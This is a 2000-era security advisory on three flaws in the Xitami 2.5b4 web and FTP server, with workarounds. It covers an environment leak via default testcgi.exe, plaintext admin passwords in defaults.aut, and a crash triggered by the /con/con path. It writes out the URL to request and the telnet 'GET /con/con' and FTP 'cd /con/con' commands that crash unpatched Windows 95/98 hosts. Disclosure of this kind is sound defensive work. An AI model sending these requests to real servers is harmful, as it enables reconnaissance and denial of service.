Network Security Solutions Inc. Security AdvisorY
                                                    (Philippine based Security Company)

Http://www.Nssolution.net
Http://connect.to/nssi
 
]***  Xitami WEB/FTP release 2.5b4 Server Multiple Security Vulnerabilities ***[
 
Author: Abraham Lincoln 
handle: zer0logic

Email : Abraham@nssolution.net, zer0logic@PrivacyX.Com,
Abraham@Digital-Defense-Network.Net
 
Date Discovered: November 29, 2000
              Vendor: iMatix Corporation
 
Disclaimer:
        This paper is intended for informational purpose only. The Author is not
responsible for the the  Use and/or potential effects of these advisories.
Read this at your own risk! or not at all.
 

1] 1st Vulnerability - TestCgi.exe file vulnerability
 
Version Affected: Xitami Web Server release 2.5b4
                           for Win 95 / 98 / NT / Win2k
   Local : Yes
Remote: Yes
     Risk: Medium
 
Problem Description:
 
                - Xitami Webservers default installation  /Cgi-Bin directory has a Vulnerability that allows remote users to View 
information regarding your system and Webserver's Directory by executing TestCgi.exe using your browser sample: 
Http://www.Target.com/cgi-bin/testcgi 
 
Sample output:
 
 Environment Variables
 
COMPUTERNAME   = MYSERVER
COMSPEC              = C:\WINNT\system32\cmd.exe
HOMEDRIVE           = C:
HOMEPATH            = \
LOGONSERVER     = \\MYSERVER
NUMBER_OF_PROCESSORS = 1
OS                   = Windows_NT
OS2LIBPATH           = C:\WINNT\system32\os2\dll;
PATH                 = C:\WINNT\system32;C:\WINNT
PROCESSOR_ARCHITECTURE = x86
PROCESSOR_IDENTIFIER = x86 Family 6 Model 8 Stepping 3, GenuineIntel
PROCESSOR_LEVEL      = 6
PROCESSOR_REVISION   = 0803
SYSTEMDRIVE          = C:
SYSTEMROOT           = C:\WINNT
TEMP                 = C:\TEMP
TMP                  = C:\TEMP
USERDOMAIN           = MYSERVER
USERNAME             = Administrator
USERPROFILE          = C:\WINNT\Profiles\Administrator
      WINDIR               = C:\WINNT
HTTP_ACCEPT_CHARSET  = iso-8859-1,*,utf-8
HTTP_ACCEPT_LANGUAGE = en
HTTP_ACCEPT_ENCODING = gzip
HTTP_ACCEPT          = image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
HTTP_HOST            = 127.0.0.1
HTTP_USER_AGENT      = Mozilla/4.75 [en] (WinNT; U)
HTTP_CONNECTION      = Keep-Alive
HTTP_CONTENT_LENGTH  = 0
SERVER_SOFTWARE      = Xitami
SERVER_VERSION       = 2.5b4
SERVER_NAME          = 127.0.0.1
SERVER_URL           = http://127.0.0.1/
SERVER_PORT          = 0
SERVER_PROTOCOL      = HTTP/1.1
SERVER_SECURITY      = -
GATEWAY_INTERFACE    = CGI/1.1
REQUEST_METHOD       = GET
QUERY_METHOD         = GET
SCRIPT_PATH          = cgi-bin
SCRIPT_NAME          = /cgi-bin/testcgi
CONTENT_TYPE         =
CONTENT_LENGTH       = 0
REMOTE_USER          = -
REMOTE_HOST          = 127.0.0.1
REMOTE_ADDR          = 127.0.0.1
PATH_INFO            =
PATH_TRANSLATED      = C:/Xitami/webpages
DOCUMENT_ROOT        = C:/Xitami/webpages
CGI_ROOT             = C:/Xitami/cgi-bin
CGI_URL              = /cgi-bin
CGI_STDIN            = C:\TEMP\pipe0001.cgi
CGI_STDOUT           = C:\TEMP\pipe0001.cgo
CGI_STDERR           = cgierr.log
 
                The Problem lies in the Default Installation of Xitami Webserver  in /cgi-bin directory  where testcgi.exe is located.
this problem could allow a malicious user to gain information about your system that can be used to Penetrate the whole 
system.
 
Work Around:
              Delete testcgi.exe file, or disable cgi-bin directory in Xitami Administration under cgi properties and always don't use 
any default installation always re configure your webserver after installing. Read some articles regarding WWW Security FAQ 
and CGI Vulnerabilities @ http://www.w3.org/Security/Faq/
 

2] 2nd Vulnerability - Plain text Password vulnerability
 
Version Affected: Xitami Web Server release 2.5b4
                           for Win 95 / 98 / NT / Win2k
  Local : Yes
Remote: No
     Risk: Medium
 
Problem Description:
                        - I Discovered that Xitami WEbserver is storing Plain Text Password of Xitami Webserver Administration to 
defaults.aut file in default installation folder of Xitami webserver w/c is C:\Xitami. even if you gonna change the installation folder 
its still the the same.  
Example:
defaults.aut 
#  Created at installation time 
#
[/Admin]
    admin="root123"                          <----- admin=username password=root123 
[Private]
    Jacky=robusta
 
            The Problem lies when the attacker gains a physical access to Xitami root directory and opens the file Defaults.Aut
the attacker may use this to gain administrator access to webserver Administration example: http://localhost/admin then the 
attacker enters the username and the password that stores in defaults.aut  then the attacker already gains a full access to the 
web server administration site.
 
            And if you try to put the password file to other folder next time you logon to Xitami WEb Administration site this error 
will appear --> Abort at smthttp:Resolve-Virtual-Hostname: (Have-Client-Request, Finished-Event) And Causes the 
Webserver to Un-usable and you need to re install the whole Application.
 
Work around:
            Don't leave your Workstation or Server open to Physical Access to the root directory of Xitami web server always 
change the default folder for the webserver instead of using C:\Xitami.
 
3] 3rd Vulnerability - Xitami Webserver and FTP Server for Win95/Win98 is Affected by /CON/CON exploit
 
Version Affected: Xitami Web Server release 2.5b4
                           for Win 95 / 98 
  Local : Yes
Remote: Yes
     Risk: High
 
Problem Description:
 
                    - Xitami Webserver and FTP Server is still Vulnerable w/ /Con/Con bug of Windows 95 and 98 that causes the 
Webserver and FTP Server to Shutdown/Crash and sometimes even the whole Operating System gets a Fatal Error. the 
Application needs to re-start again to perform normal operation.
 
                    The Problem lies when the attacker send this request to the Webserver -->GET /con/con HTTP/1.0 by using 
telnet client to execute this to remote host type -->Telnet <Target IP> 80 if you are already connected try to Execute the GET 
/con/con HTTP/1.0 command then  press Enter. The Server will Now crash or Shutdown and If the Operating System is Not Patch with Con/Con Bug.
 
                    On the FTP Server try to login as a Anonymous user or any user that allows access to FTP Server then execute 
this Command Ftp>cd /con/con the FTP Server will disconnect you from remote host and it will Shutdown or Crash.
 
Work Around:
                     Install the Con/Con Bug PATCH to your Operating System, Patch is Available @ Microsoft Website or @ http://packetstormsecurity.org/Win/ConConFix2.zip coz` the bug also lies on ur O.S.
 
Vendor Status: iMatix Corporation has been notified of this Vulnerability but no patch has been issued yet.
 
NOTE: 
         Sorry for the grammar etc... coz` this is just a 5 Minute Exploit if u have some questions email me.. all spam mails and lame emails are just ignored. -zer0logic-

Related Links: Http://www.nssolution.net
                      Http://connect.to/nssi
                      Http://www.Digital-Defense-Network.Net 

         
Feedback and Inquiries:
            If you have any questions, inquiries, feedback, concerns and
updates pls don't hesitate to email us.
 
For Inquiries,Concerns and updates - Info@Nssolution.net
 
for Comments and Questions - Abraham@nssolution.net ,lincoln@privacyx.com
                                             zer0logic@privacyx.com 
IRC                                      - Dal.net #DDN Undernet #Hackphreak
 
Copyright(c) 2000-2001 Network Security Solutions Inc.
Permission is herby granted for the redistribution of this alert
electronically. if you wish to reprint or modify this document Contact us
1st or email us at: info@Nssolution.Net